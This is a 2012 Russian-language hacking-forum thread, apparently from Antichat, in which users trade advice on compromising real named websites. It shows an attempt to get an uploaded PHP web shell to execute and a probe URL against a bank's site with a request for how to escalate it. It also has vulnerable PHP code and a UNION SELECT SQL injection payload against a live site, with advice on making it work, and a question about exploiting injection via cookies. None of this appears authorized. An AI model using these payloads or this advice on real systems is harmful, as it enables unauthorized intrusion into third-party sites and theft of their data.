
21.03.2012, 15:47
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
да ты попробуй,во многих случаях помагает,так как расширение не пхп будет
|
|
|

21.03.2012, 15:54
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Faaax
да ты попробуй,во многих случаях помагает,так как расширение не пхп будет
Попробовал, картинка просто начинает скачиватся
|
|
|

21.03.2012, 17:00
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
qaz, удали .htaccess, тогда 500-ошибка исчезнет.
|
|
|

21.03.2012, 17:27
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Ereee
qaz,
удали .htaccess, тогда 500-ошибка исчезнет.
я не могу его удалить, я могу только заливать файлы и удалять то что залил
Сообщение от Nightmarе
Ага, как вариант, но вообще, эта ошибка появляется когда файл загружается по умолчанию с правами 644, а для выполнения php кода ему нужно другие права, как правило это 755, вот чмодом только и можно помочь.
наверно так оно есть, блян, не залью я шелл 
|
|
|

21.03.2012, 17:54
|
|
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами:
7530806
Репутация:
0
|
|
Вот хотел спросить как раскрутить это
Код:
http://www.nurbank.kz/investor/meetings/?page=%22'%3CCwSlZ%3E
|
|
|

21.03.2012, 17:56
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от anonym_di
Вот хотел спросить как раскрутить это
Код:
http://www.nurbank.kz/investor/meetings/?page=%22'%3CCwSlZ%3E
никак
|
|
|

21.03.2012, 18:37
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Безусловно я набиваю посты! Интересно куда смотрят модераторы, пускай банят
Вот запрос
http://www.f-b-i.ru/index.php?id=0
id попадает в LIMIT, сам селект
$id = $_GET['id'];
$result=mysql_query("SELECT * FROM wp_posts where ID=1 limit $id,1");
Вот скуль
http://www.f-b-i.ru/index.php?id=0,1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+--+1
Почему нельзя в LIMIT крутить скуль?
|
|
|

21.03.2012, 19:47
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от t0ma5
Безусловно я набиваю посты! Интересно куда смотрят модераторы, пускай банят
Вот запрос
http://www.f-b-i.ru/index.php?id=0
id попадает в LIMIT, сам селект
$id = $_GET['id'];
$result=mysql_query("SELECT * FROM wp_posts where ID=1 limit $id,1");
Вот скуль
http://www.f-b-i.ru/index.php?id=0,1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+--+1
Почему нельзя в LIMIT крутить скуль?
order by поставь в запрос, как на сайте, и крути
|
|
|

21.03.2012, 19:48
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее KolosJey.
|
|
|

21.03.2012, 23:26
|
|
Познающий
Регистрация: 12.03.2012
Сообщений: 40
С нами:
7457366
Репутация:
0
|
|
А что если sql-inj присутствует в кукисах.То как её можно проверить и воспользоваться этим?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|